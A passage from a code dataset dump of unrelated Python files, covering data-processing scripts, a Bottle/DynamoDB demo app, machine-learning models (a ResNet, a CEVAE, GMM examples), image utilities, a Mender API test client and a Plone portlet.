\"/Users/Kate/Desktop/PROGETTOBDC/elaboratedFiles/Viasat.csv\"\ngriglia = Grid(\"/Users/Kate/Documents/Eleganza/roma-grid/intersection_Roma_W_GRIDIT_NEW\")\n\ndict_path, time = ib.elaborate_infoBlue(pathInfoBlue, griglia)\n\nwith open(\"/Users/Kate/Documents/Eleganza/dict_path.csv\", \"wb\") as smth:\n\twriter = csv.writer(smth)\n\tfor key in dict_path:\n\t\tvalue = dict_path[key]\n\t\tline = [key]\n\t\tfor i in range(0,len(value)):\n\t\t\tline.append(value[i])\n\t\twriter.writerow(line)\n\nwith open(\"/Users/Kate/Documents/Eleganza/time.csv\", \"wb\") as smth:\n\twriter = csv.writer(smth)\n\tfor key in time:\n\t\tvalue = time[key]\n\t\tline = [key, str(value[0]), str(value[1])]\n\t\twriter.writerow(line)\n\ninit = wc.weight_computator(griglia, path, pathpresence, pathunipol, pathviasat)\ninit.set_dictionary()\ninit.griglia = None\n\nout = open(\"/Users/Kate/Documents/Eleganza/init\",\"w\")\npickle.dump(init,out)\n\n","sub_path":"write_dictionaries.py","file_name":"write_dictionaries.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"121919045","text":"from bottle import route, run, template, redirect, request, static_file\nfrom bottle import TEMPLATE_PATH, jinja2_template as template\n\nimport os\nimport boto3\nimport urllib.request, urllib.parse\nimport json\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nTEMPLATE_PATH.append(BASE_DIR + \"/views\")\n\n@route('/css/')\ndef server_css(filename):\n \"\"\" setting for css file \"\"\"\n return static_file(filename, root=BASE_DIR+\"/static/css\")\n\n@route('/js/')\ndef server_js(filename):\n \"\"\" setting for js file \"\"\"\n return static_file(filename, root=BASE_DIR+\"/static/js\")\n\n@route('/img/')\ndef server_img(filename):\n \"\"\" setting for img file \"\"\"\n return static_file(filename, root=BASE_DIR+\"/static/img\")\n\n@route('/font/')\ndef server_font(filename):\n \"\"\" setting for font file \"\"\"\n return static_file(filename, root=BASE_DIR+\"/static/fonts\") \n\n####################\n# Connect to DynamoDB\n####################\ndynamodb = boto3.resource('dynamodb', region_name='us-west-2')\ntable_keys = dynamodb.Table('aiqapi-keys-t')\ntable_users = dynamodb.Table('aiqapi-users-t')\n\n####################\n# API URL (System Summary)\n####################\nbase_url = 'https://api.activeiq.netapp.com/v1/system/summary/level/'\n\n@route(\"/\")\ndef index():\n auth_key = get_auth_key()\n return template(\"index\", auth_key=auth_key)\n\n@route(\"/login\", method=\"POST\")\ndef login():\n user_name = request.forms.getunicode(\"username\")\n result = get_user_scope(user_name)\n scope_str = itemgetter('scopestring')(result['Item'])\n scope_id = itemgetter('scopeid')(result['Item'])\n if scope_str == 'all':\n url = base_url + 'customer/id/' + scope_id\n scope_name = \"サイト全体\"\n else:\n url = base_url + 'site/id/' + scope_id\n scope_name = scope_str\n items=get_items(url)\n counts_dict = items['inventory']['counts']\n types_dict = items['inventory']['types']\n print(types_dict)\n return template(\"userview\", counts=counts_dict, types_d=types_dict, scope_name=scope_name)\n\n####################\n# Functions\n####################\ndef get_items(url):\n headers = {\n 'Content-Type': 'application/json',\n 'authorizationToken':get_auth_key()\n }\n req = urllib.request.Request(url, headers=headers)\n print(req)\n with urllib.request.urlopen(req) as res:\n summary_list = json.loads(res.read().decode('utf-8'))\n return summary_list\n\ndef get_auth_key():\n response = table_keys.get_item(\n Key={\n 'cust_id': 1\n }\n )\n item = itemgetter('auth_key')(response['Item'])\n return item\n\ndef get_user_scope(uname):\n response = table_users.get_item(\n Key={\n 'username': uname \n }\n )\n return response\n\n# Utility Function\ndef itemgetter(*items):\n if len(items) == 1:\n item = items[0]\n def g(obj):\n return obj[item]\n else:\n def g(obj):\n return tuple(obj[item] for item in items)\n return g\n\n####################\n# Invoke test server\n####################\nrun(host=\"0.0.0.0\", port=8080, debug=True, reloader=True)\n\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"408324108","text":"import xml.etree.cElementTree as et \nimport csv\n\ntree = et.parse (\"covid_cases_xml.xml\")\nroot = tree.getroot()\nDate_reported = []\nCountries_territories = []\nCases_number = []\nDeath_number = []\n\nfor date in root.iter(\"dateRep\"):\n Date_reported.append (date.text)\nfor countries in root.iter(\"countries\"):\n Countries_territories.append (countries.text)\nfor cases in root.iter(\"cases\"):\n Cases_number.append (cases.text)\nfor deaths in root.iter(\"deaths\"):\n Death_number.append (deaths.text)\n\ncovid_cases = open(\"covid_cases_parse\", \"w\")\nwriter = csv.writer(covid_cases)\nwriter.writerow([\"Date_reported\",\"Countries_territories\", \"Cases_number\", \"Death_number\"])\nfor i in range (len(Date_reported)):\n writer.writerow([Date_reported[i], Countries_territories[i], Cases_number[i], Death_number[i]])\n ","sub_path":"parse.xml.py","file_name":"parse.xml.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"13723057","text":"from chainer import Chain\r\nimport chainer.functions as F\r\nimport chainer.links as L\r\n\r\n\r\nclass Block(Chain):\r\n\r\n def __init__(self, ch = 192, fcl = 256, o_ch = 1):\r\n super(Block, self).__init__()\r\n self.ch = ch\r\n self.fcl = fcl\r\n self.o_ch = o_ch\r\n with self.init_scope():\r\n self.conv1 = L.Convolution2D(in_channels = self.ch, out_channels = self.ch, ksize = 2, pad = 1, nobias=True)\r\n self.bn1 = L.BatchNormalization(self.ch)\r\n self.conv2 = L.Convolution2D(in_channels = self.ch, out_channels = self.ch, ksize = 2, pad = 1, nobias=True)\r\n self.bn2 = L.BatchNormalization(self.ch)\r\n\r\n def __call__(self, x):\r\n h1 = F.relu(self.bn1(self.conv1(x)))\r\n h2 = self.bn2(self.conv2(h1))\r\n return F.relu(x + h2)\r\n\r\n\r\nclass PolicyValueResnet(Chain):\r\n def __init__(self, blocks = 5, ch = 192, fcl = 256, o_ch = 1):\r\n super(PolicyValueResnet, self).__init__()\r\n self.blocks = blocks\r\n self.ch = ch\r\n self.fcl = fcl\r\n self.o_ch = o_ch\r\n with self.init_scope():\r\n self.l1 = L.Convolution2D(in_channels = 2, out_channels = self.ch, ksize = 2, pad = 1)\r\n for i in range(1, blocks):\r\n self.add_link('b{}'.format(i), Block())\r\n # policy network\r\n self.policy = L.Convolution2D(in_channels = self.ch, out_channels = self.o_ch, ksize = 1, nobias = True)\r\n self.policy_bias = L.Bias(shape=(8 * 8 * self.o_ch))\r\n # value network\r\n self.value1 = L.Convolution2D(in_channels = self.ch, out_channels = self.o_ch, ksize = 1)\r\n self.value1_bn = L.BatchNormalization(self.o_ch)\r\n self.value2 = L.Linear(8 * 8 * self.o_ch, self.fcl)\r\n self.value3 = L.Linear(self.fcl, 1)\r\n\r\n def __call__(self, x):\r\n h = F.relu(self.l1(x))\r\n for i in range(1, self.blocks):\r\n h = self['b{}'.format(i)](h)\r\n # policy network\r\n h_policy = self.policy(h)\r\n u_policy = self.policy_bias(F.reshape(h_policy, (-1, 8 * 8 * self.o_ch)))\r\n # value network\r\n h_value = F.relu(self.value1_bn(self.value1(h)))\r\n h_value = F.relu(self.value2(h_value))\r\n u_value = self.value3(h_value)\r\n return u_policy, u_value","sub_path":"network/policy_value_resnet.py","file_name":"policy_value_resnet.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61709591","text":"import os\nimport cv2\nimport PIL.Image as Image\nimport PIL.ImageColor as ImageColor\nimport PIL.ImageDraw as ImageDraw\nimport PIL.ImageFont as ImageFont\n\ndef draw_bboxs(image, ymin, xmin, ymax, xmax, color='red', thickness=4, display_str_list=(), use_normalized_coordinates=True):\n draw = ImageDraw.Draw(image)\n im_width, im_height = image.size\n if use_normalized_coordinates:\n (left, right, top, bottom) = (xmin * im_width, xmax * im_width, ymin * im_height, ymax * im_height)\n else:\n (left, right, top, bottom) = (xmin, xmax, ymin, ymax)\n if thickness > 0:\n draw.line([(left, top), (left, bottom), (right, bottom), (right, top), (left, top)], width=thickness, fill=color)\n\ndef visualize():\n return 1\n\n\n\"\"\"\nSource: Google/Automl/Efficientdet\n\"\"\"\ndef draw_bounding_box_on_image(image,\n ymin,\n xmin,\n ymax,\n xmax,\n color='red',\n thickness=4,\n display_str_list=(),\n use_normalized_coordinates=True):\n \"\"\"Adds a bounding box to an image.\n Bounding box coordinates can be specified in either absolute (pixel) or\n normalized coordinates by setting the use_normalized_coordinates argument.\n Each string in display_str_list is displayed on a separate line above the\n bounding box in black text on a rectangle filled with the input 'color'.\n If the top of the bounding box extends to the edge of the image, the strings\n are displayed below the bounding box.\n Args:\n image: a PIL.Image object.\n ymin: ymin of bounding box.\n xmin: xmin of bounding box.\n ymax: ymax of bounding box.\n xmax: xmax of bounding box.\n color: color to draw bounding box. Default is red.\n thickness: line thickness. Default value is 4.\n display_str_list: list of strings to display in box (each to be shown on its\n own line).\n use_normalized_coordinates: If True (default), treat coordinates ymin, xmin,\n ymax, xmax as relative to the image. Otherwise treat coordinates as\n absolute.\n \"\"\"\n draw = ImageDraw.Draw(image)\n im_width, im_height = image.size\n if use_normalized_coordinates:\n (left, right, top, bottom) = (xmin * im_width, xmax * im_width,\n ymin * im_height, ymax * im_height)\n else:\n (left, right, top, bottom) = (xmin, xmax, ymin, ymax)\n if thickness > 0:\n draw.line([(left, top), (left, bottom), (right, bottom), (right, top),\n (left, top)],\n width=thickness,\n fill=color)\n try:\n font = ImageFont.truetype('arial.ttf', 24)\n except IOError:\n font = ImageFont.load_default()\n\n # If the total height of the display strings added to the top of the bounding\n # box exceeds the top of the image, stack the strings below the bounding box\n # instead of above.\n display_str_heights = [font.getsize(ds)[1] for ds in display_str_list]\n # Each display_str has a top and bottom margin of 0.05x.\n total_display_str_height = (1 + 2 * 0.05) * sum(display_str_heights)\n\n if top > total_display_str_height:\n text_bottom = top\n else:\n text_bottom = bottom + total_display_str_height\n # Reverse list and print from bottom to top.\n for display_str in display_str_list[::-1]:\n text_width, text_height = font.getsize(display_str)\n margin = np.ceil(0.05 * text_height)\n draw.rectangle([(left, text_bottom - text_height - 2 * margin),\n (left + text_width, text_bottom)],\n fill=color)\n draw.text((left + margin, text_bottom - text_height - margin),\n display_str,\n fill='black',\n font=font)\n text_bottom -= text_height - 2 * margin\n\n\n\n\ndef resize_images_in_dir(dir_path, t_width, t_height):\n for image_path in sorted(os.listdir(dir_path)):\n print(image_path)\n if os.path.isfile(os.path.join(dir_path, image_path)):\n image = cv2.imread(os.path.join(dir_path, image_path))\n resized_image = cv2.resize(image, (t_width, t_height))\n ret = cv2.imwrite(os.path.join(dir_path, image_path), resized_image)\n print(ret)","sub_path":"tools/py/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"335443777","text":"from __future__ import absolute_import, division, print_function\nimport numpy as np\n\nimport edward as ed\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom edward.models import Normal, Bernoulli\n\nfrom Utils import batch_generator, evalaute_effect_estimate, get_fc_layer_fn, matching_estimate\n# ----------------------------------------------------------------------------------------------------------------------------#\n\n\ndef learn_standard(args, train_set, test_set, anlysis_flag=False):\n\n\n # Parameters\n n_hidd = 1000 # number of hidden units\n n_epoch = args.n_epoch\n learning_rate = 0.001\n batch_size = 128\n\n hidden_layer = get_fc_layer_fn(l2_reg_scale=1e-4, depth=1)\n out_layer = get_fc_layer_fn(l2_reg_scale=1e-4)\n\n x_train, t_train, y_train = train_set['X'], train_set['T'], train_set['Y']\n\n n_train = x_train.shape[0]\n x_dim = x_train.shape[1]\n\n batch_size = min(batch_size, n_train)\n\n # ------ Define Graph ---------------------#\n tf.reset_default_graph()\n # ------ Define Inputs ---------------------#\n # define placeholder which will receive data batches\n x_ph = tf.placeholder(tf.float32, [None, x_dim])\n t_ph = tf.placeholder(tf.float32, [None, 1])\n y_ph = tf.placeholder(tf.float32, [None, 1])\n\n n_ph = tf.shape(x_ph)[0] # number of samples fed to placeholders\n\n # ------ Define generative model /decoder-----------------------#\n\n z_dim = 5 #\n\n # p(z) - prior over latent variables:\n z = Normal(loc=tf.zeros([n_ph, z_dim]), scale=tf.ones([n_ph, z_dim]))\n\n latent_dim = z_dim\n\n # p(x|z) - likelihood of proxy X\n hidden = hidden_layer(z, n_hidd, tf.nn.elu)\n x = Normal(loc=out_layer(hidden, x_dim, None),\n scale=out_layer(hidden, x_dim, tf.nn.softplus),\n name='gaussian_px_z')\n\n # p(t|z)\n hidden = hidden_layer(z, n_hidd, tf.nn.elu)\n probs = out_layer(hidden, 1, tf.nn.sigmoid) # output in [0,1]\n t = Bernoulli(probs=probs, dtype=tf.float32, name='bernoulli_pt_z')\n\n # p(y|t,z)\n hidden = hidden_layer(z, n_hidd, tf.nn.elu) # shared hidden layer\n mu_y_t0 = out_layer(hidden, 1, None)\n mu_y_t1 = out_layer(hidden, 1, None)\n # y = Normal(loc=t * mu_y_t1 + (1. - t) * mu_y_t0, scale=tf.ones_like(mu_y_t0))\n sigma_y_t0 = out_layer(hidden, 1, tf.nn.softplus)\n sigma_y_t1 = out_layer(hidden, 1, tf.nn.softplus)\n y = Normal(loc=t * mu_y_t1 + (1. - t) * mu_y_t0,\n scale=t * sigma_y_t1 + (1. - t) * sigma_y_t0)\n\n\n # ------ Define inference model - CEVAE variational approximation (encoder)\n\n # q(t|x)\n hqt = hidden_layer(x_ph, n_hidd, tf.nn.elu)\n probs = out_layer(hqt, 1, tf.nn.sigmoid) # output in [0,1]\n qt = Bernoulli(probs=probs, dtype=tf.float32)\n\n # q(y|x,t)\n hqy = hidden_layer(x_ph, n_hidd, tf.nn.elu) # shared hidden layer\n mu_qy_t0 = out_layer(hqy, 1, None)\n mu_qy_t1 = out_layer(hqy, 1, tf.nn.elu)\n sigma_qy_t1 = out_layer(hqy, 1, tf.nn.softplus)\n sigma_qy_t0 = out_layer(hqy, 1, tf.nn.softplus)\n # qy = Normal(loc=qt * mu_qy_t1 + (1. - qt) * mu_qy_t0, scale=tf.ones_like(mu_qy_t0))\n qy = Normal(loc=qt * mu_qy_t1 + (1. - qt) * mu_qy_t0,\n scale=qt * sigma_qy_t1 + (1. - qt) * sigma_qy_t0)\n\n # q(z|x,t,y)\n inpt2 = tf.concat([x_ph, qy], axis=1)\n hqz = hidden_layer(inpt2, n_hidd, tf.nn.elu) # shared hidden layer\n muq_t0 = out_layer(hqz, latent_dim, None)\n sigmaq_t0 = out_layer(hqz, latent_dim, tf.nn.softplus)\n muq_t1 = out_layer(hqz, latent_dim, None)\n sigmaq_t1 = out_layer(hqz, latent_dim, tf.nn.softplus)\n qz = Normal(loc=qt * muq_t1 + (1. - qt) * muq_t0,\n scale=qt * sigmaq_t1 + (1. - qt) * sigmaq_t0)\n\n # ------ Criticism / evaluation graph:\n z_learned = ed.copy(qz, {x: x_ph})\n\n # sample posterior predictive for p(y|z,t)\n y_post = ed.copy(y, {z: qz, t: t_ph}, scope='y_post')\n # crude approximation of the above\n y_post_mean = ed.copy(y, {z: qz.mean(), t: t_ph}, scope='y_post_mean')\n\n # ------ Training - Run variational inference\n\n # Create data dictionary for edward\n data = {x: x_ph, y: y_ph, qt: t_ph, t: t_ph, qy: y_ph}\n\n batch_size = min(batch_size, n_train)\n n_iter_per_epoch = n_train // batch_size\n\n inference = ed.KLqp({z: qz}, data=data)\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n data_scaling = n_train / batch_size # to scale likelihood againt prior\n inference.initialize(optimizer=optimizer, n_samples=5, n_iter=n_iter_per_epoch * n_epoch,\n scale={x: data_scaling, t: data_scaling, y: data_scaling})\n\n\n # end graph def\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n\n for epoch in range(n_epoch):\n train_generator = batch_generator(np.random.permutation(n_train), batch_size)\n avg_loss = 0.0\n for j in range(n_iter_per_epoch):\n # Take batch:\n idx = next(train_generator)\n x_b, t_b, y_b = x_train[idx], t_train[idx], y_train[idx]\n info_dict = inference.update(feed_dict={x_ph: x_b, t_ph: t_b, y_ph: y_b})\n inference.print_progress(info_dict)\n avg_loss += info_dict['loss']\n avg_loss = avg_loss / n_iter_per_epoch\n avg_loss = avg_loss / batch_size\n # print('Epoch {}, avg loss {}'.format(epoch, avg_loss))\n\n\n\n # ------ Evaluation -\n x_test = test_set['X']\n\n # if z_dim == 1:\n # z_est = sess.run(z_learned.mean(), feed_dict={x_ph: x_test})\n # plt.scatter(x_test[:, 0].flatten(), z_est.flatten())\n # plt.xlabel('X_0')\n # plt.ylabel('Z')\n # plt.show()\n #\n # z_est = sess.run(z_learned.mean(), feed_dict={x_ph: x_test})\n # plt.scatter(x_test[:, 1].flatten(), z_est.flatten())\n # plt.xlabel('X_1')\n # plt.ylabel('Z')\n # plt.show()\n\n # CATE estimation:\n if args.estimation_type == 'approx_posterior':\n forced_t = np.ones((args.n_test, 1))\n est_y1 = sess.run(y_post.mean(), feed_dict={x_ph: x_test, t_ph: forced_t})\n est_y0 = sess.run(y_post.mean(), feed_dict={x_ph: x_test, t_ph: 0*forced_t})\n elif args.estimation_type == 'latent_matching':\n z_test = sess.run(z_learned.mean(), feed_dict={x_ph: x_test})\n z_train = sess.run(z_learned.mean(), feed_dict={x_ph: x_train})\n est_y0, est_y1 = matching_estimate(z_train, t_train, y_train, z_test, args.n_neighbours)\n else:\n raise ValueError('Unrecognised estimation_type')\n\n return evalaute_effect_estimate(est_y0, est_y1, test_set, args, model_name='CEVAE, Latent dim: ' + str(latent_dim),\n estimation_type=args.estimation_type)\n\n # end session\n\n\n","sub_path":"learn_standard_CEVAE.py","file_name":"learn_standard_CEVAE.py","file_ext":"py","file_size_in_byte":6867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"74180811","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns; sns.set()\r\n\r\n\r\nfrom sklearn.datasets.samples_generator import make_blobs\r\nX, y_true = make_blobs(n_samples=400, centers=4, cluster_std=0.60, random_state=0)\r\nX = X[:, ::-1] # 交换列,方便画图\r\n\r\nfrom sklearn.cluster import KMeans\r\nkmeans = KMeans(4, random_state=0)\r\nlabels = kmeans.fit(X).predict(X)\r\nplt.scatter(X[:, 0], X[:, 1], c=labels, s=40, cmap='viridis')\r\nplt.show()\r\n\r\n\r\nfrom sklearn.cluster import KMeans\r\nfrom scipy.spatial.distance import cdist\r\n\r\ndef plot_kmeans(kmeans, X, n_cluster=4, rseed=0, ax=None):\r\n labels = kmeans.fit_predict(X)\r\n\r\n # 画出输入数据\r\n ax = ax or plt.gca()\r\n ax.axis('equal')\r\n ax.scatter(X[:, 0], X[:, 1], c=labels, s=40, cmap='viridis', zorder=2)\r\n\r\n # 画出k-means模型的表示\r\n centers = kmeans.cluster_centers_\r\n radii = [cdist(X[labels == i], [center]).max() for i, center in enumerate(centers)]\r\n for c, r in zip(centers, radii):\r\n ax.add_patch(plt.Circle(c, r, fc='#CCCCCC', lw=3, alpha=0.5, zorder=1))\r\n\r\nkmeans = KMeans(n_clusters=4, random_state=0)\r\nplot_kmeans(kmeans, X)\r\nplt.show()\r\n\r\n\r\nrng = np.random.RandomState(13)\r\nX_stretched = np.dot(X, rng.randn(2, 2))\r\n\r\nkmeans = KMeans(n_clusters=4, random_state=0)\r\nplot_kmeans(kmeans, X_stretched)\r\nplt.show()\r\n\r\n\r\n\"\"\"高斯混合模型 Gaussian mixture model GMM\"\"\"\r\nfrom sklearn.mixture import GMM\r\ngmm = GMM(n_components=4).fit(X)\r\nlabels = gmm.predict(X)\r\nprint(X.shape)\r\nplt.scatter(X[:, 0], X[:, 1], c=labels, s=40, cmap='viridis')\r\nplt.show()\r\n\r\nprobs = gmm.predict_proba(X)\r\nprint(probs[:5].round(3))\r\n\r\n# 用点的大小反映概率\r\nsize = 50 * probs.max(1) ** 2 # 平方强调差异\r\nplt.scatter(X[:, 0], X[:, 1], c=labels, cmap='viridis', s=size)\r\nplt.show()\r\n\r\nfrom matplotlib.patches import Ellipse\r\n\r\ndef draw_ellipse(position, covariance, ax=None, **kwargs):\r\n \"\"\"用给定的位置和协方差画一个椭圆\"\"\"\r\n ax = ax or plt.gca()\r\n\r\n # 将协方差转换成主轴\r\n if covariance.shape == (2, 2):\r\n U, s, Vt = np.linalg.svd(covariance)\r\n angle = np.degrees(np.arctan2(U[1, 0], U[0, 0]))\r\n width, height = 2 * np.sqrt(s)\r\n else:\r\n angle = 0\r\n width, height = 2 * np.sqrt(covariance)\r\n\r\n # 画出椭圆\r\n for nsig in range(1, 4):\r\n ax.add_patch(Ellipse(position, nsig * width, nsig * height, angle, **kwargs))\r\n\r\ndef plot_gmm(gmm, X, label=True, ax=None):\r\n ax = ax or plt.gca()\r\n labels = gmm.fit(X).predict(X)\r\n if label:\r\n ax.scatter(X[:, 0], X[:, 1], c=labels, s=40, cmap='viridis', zorder=2)\r\n else:\r\n ax.scatter(X[:, 0], X[:, 1], s=40, zorder=2)\r\n\r\n ax.axis('equal')\r\n\r\n w_factor = 0.2 / gmm.weights_.max()\r\n for pos, covar, w in zip(gmm.means_, gmm.covars_, gmm.weights_):\r\n draw_ellipse(pos, covar, alpha=w * w_factor)\r\n\r\ngmm = GMM(n_components=4, random_state=42)\r\nplot_gmm(gmm, X)\r\nplt.show()\r\n\r\ngmm = GMM(n_components=4, covariance_type='full', random_state=42)\r\nplot_gmm(gmm, X_stretched)\r\nplt.show()\r\n\r\n\r\n\"\"\"用GMM作密度估计\"\"\"\r\nfrom sklearn.datasets import make_moons\r\nXmoon, ymoon = make_moons(200, noise=.05, random_state=0)\r\nplt.scatter(Xmoon[:, 0], Xmoon[:, 1])\r\nplt.show()\r\n\r\n# 2个成分拟合\r\ngmm2 = GMM(n_components=2, covariance_type='full', random_state=0)\r\nplot_gmm(gmm2, Xmoon)\r\nplt.show()\r\n\r\n# 16个成分拟合\r\ngmm16 = GMM(n_components=16, covariance_type='full', random_state=0)\r\nplot_gmm(gmm16, Xmoon)\r\nplt.show()\r\n\r\n# 用带16个成分的GMM生成新数据\r\nXnew = gmm16.sample(400, random_state=42)\r\nplt.scatter(Xnew[:, 0], Xnew[:, 1])\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"PyhtonDataScienceHandbook/GMM/Gaussian_mixture_model.py","file_name":"Gaussian_mixture_model.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"631930968","text":"#!/usr/bin/python\n# Copyright 2016 Mender Software AS\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os.path\nimport logging\n\nimport pytest\nfrom bravado.swagger_model import load_file\nfrom bravado.client import SwaggerClient, RequestsClient\nfrom requests.utils import parse_header_links\n\n\nAPI_URL = \"http://%s/api/%s/\" % \\\n (pytest.config.getoption(\"host\"), \\\n pytest.config.getoption(\"api\"))\n\n\nclass Client(object):\n\n config = {\n 'also_return_response': True,\n 'validate_responses': True,\n 'validate_requests': False,\n 'validate_swagger_spec': False,\n 'use_models': True,\n }\n\n\n def setup(self):\n self.log = logging.getLogger(\"client.Client\")\n self.api_url = API_URL\n self.http_client = RequestsClient()\n self.http_client.session.verify = False\n\n spec = pytest.config.getoption(\"spec\")\n self.client = SwaggerClient.from_spec(load_file(spec),\n config=self.config,\n http_client=self.http_client)\n self.client.swagger_spec.api_url = self.api_url\n\n def make_api_url(self, path):\n return os.path.join(self.api_url,\n path if not path.startswith(\"/\") else path[1:])\n\n def accept_device(self, devid):\n return self.put_device_status(devid, 'accepted')\n\n def reject_device(self, devid):\n return self.put_device_status(devid, 'rejected')\n\n def put_device_status(self, devid, status):\n Status = self.client.get_model('Status')\n st = Status(status=status)\n return self.client.devices.put_devices_id_status(id=devid, status=st).result()\n\n def verify_token(self, token):\n return self.client.devices.put_devices_id_status(id=devid, status=st).result()\n","sub_path":"tests/tests/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"136448115","text":"# import cv2 as cv\n# import numpy as np\n# img = cv.imread('j.png',0)\n# kernel = np.ones((5,5),np.uint8)\n# erosion = cv.erode(img,kernel,iterations = 1)\n\n\n# Python program to demonstrate erosion and \n# dilation of images. \nimport cv2 \nimport numpy as np \nimport glog as log\n\ndef _connect_components_analysis(image):\n \"\"\"\n connect components analysis to remove the small components\n :param image:\n :return:\n \"\"\"\n if len(image.shape) == 3:\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n else:\n gray_image = image\n\n return cv2.connectedComponentsWithStats(gray_image, connectivity=8, ltype=cv2.CV_32S)\n\n# Reading the input image \n# img = cv2.imread('/aimldl-dat/logs/testing/morphology/instance/170419_131147_16716_zed_l_030.jpg', 0) \n# img = cv2.imread('/aimldl-dat/logs/testing/morphology/instance/170419_131147_16716_zed_l_030.jpg') \nimg = cv2.imread('/aimldl-dat/logs/testing/morphology/instance/170419_130711_16716_zed_l_051.jpg') \n\n\n# Taking a matrix of size 5 as the kernel \nkernel = np.ones((5,5), np.uint8) \n\n# The first parameter is the original image, \n# kernel is the matrix with which image is \n# convolved and third parameter is the number \n# of iterations, which will determine how much \n# you want to erode/dilate a given image.\n\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n\n# connect_components_analysis_ret = _connect_components_analysis(image=img)\n# log.info(\"connect_components_analysis_ret : {}\".format(connect_components_analysis_ret[1]))\n\nimg_erosion = cv2.erode(opening, kernel, iterations=1) \nimg_dilation = cv2.dilate(img, kernel, iterations=1) \nedges = cv2.Canny(img,100,200)\n\n\ncv2.imshow('Input', img) \ncv2.imshow('Opening', opening) \ncv2.imshow('Erosion', img_erosion) \ncv2.imshow('Dilation', img_dilation) \ncv2.imshow('Edges', edges) \n# cv2.imwrite('edges.jpg',edges)\n\ncv2.waitKey(0) \n","sub_path":"python/morphology.py","file_name":"morphology.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"89244435","text":"# -*- coding: utf-8 -*-\nfrom Acquisition import aq_inner\nfrom plone.app.portlets import PloneMessageFactory as _\nfrom plone.app.portlets.portlets import base\nfrom plone.memoize import view as pm_view\nfrom plone.portlets.interfaces import IPortletDataProvider\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom zope import schema\nfrom zope.component import getMultiAdapter\nfrom zope.interface import implements\n\n\nclass IActionsPortlet(IPortletDataProvider):\n \"\"\"A portlet that shows an action category\"\"\"\n\n ptitle = schema.TextLine(\n title=_(u'label_title',\n default=u\"Title\"),\n description=_(u'help_title',\n default=u\"Displayed title of this portlet\"),\n default=u\"\",\n required=False)\n\n show_title = schema.Bool(\n title=_(u'label_show_title',\n default=u\"Show title\"),\n description=_(u'help_show_title',\n default=u\"Show title of this portlet.\"),\n required=True,\n default=True)\n\n category = schema.Choice(\n title=_(u'label_actions_category',\n default=u\"Actions category\"),\n description=_(u'help_actions_category',\n default=u\"Select an action category\"),\n required=True,\n vocabulary='plone.app.vocabularies.Actions')\n\n show_icons = schema.Bool(\n title=_(u'label_show_icons',\n default=u\"Show icons\"),\n description=_(u'help_show_icons',\n default=u\"Show icons or default icon for actions without icon.\"),\n required=True,\n default=True)\n\n default_icon = schema.ASCIILine(\n title=_(u'label_default_icon',\n default=u\"Default icon\"),\n description=_(u'help_default_icon',\n default=u\"What icon we should use for actions with no specific icons. A 16*16 pixels image.\"),\n required=False,\n default='action_icon.png')\n\n\nclass Assignment(base.Assignment):\n \"\"\"Portlet assignment.\n This is what is actually managed through the portlets UI and associated\n with columns.\n \"\"\"\n\n implements(IActionsPortlet)\n\n ptitle = u\"\"\n show_title = True\n category = u\"\"\n show_icons = True\n default_icon = 'action_icon.png'\n\n def __init__(self, ptitle=u\"\", show_title=True, category=u\"\", show_icons=True, default_icon='action_icon.png'):\n self.ptitle = ptitle\n self.show_title = show_title\n self.category = category\n self.show_icons = show_icons\n self.default_icon = default_icon\n return\n\n @property\n def title(self):\n \"\"\"This property is used to give the title of the portlet in the\n \"manage portlets\" screen.\n \"\"\"\n return _(u\"Actions portlet\") + ' \"%s\"' % (self.ptitle or self.category)\n\n\nclass Renderer(base.Renderer):\n \"\"\"Actions portlet renderer.\"\"\"\n\n render = ViewPageTemplateFile('actions.pt')\n\n @property\n def available(self):\n \"\"\"Override base class\"\"\"\n return bool(self.actionLinks())\n\n @property\n def title(self):\n \"\"\"Portlet title\"\"\"\n\n return self.data.ptitle\n\n @property\n def showTitle(self):\n \"\"\"Show portlet title\"\"\"\n return self.data.show_title\n\n def actionLinks(self):\n \"\"\"Features of action links\"\"\"\n return self.cachedLinks(self.data.category, self.data.default_icon,\n self.data.show_icons)\n\n @pm_view.memoize\n def cachedLinks(self, actions_category, default_icon, show_icons):\n context_state = getMultiAdapter((aq_inner(self.context), self.request),\n 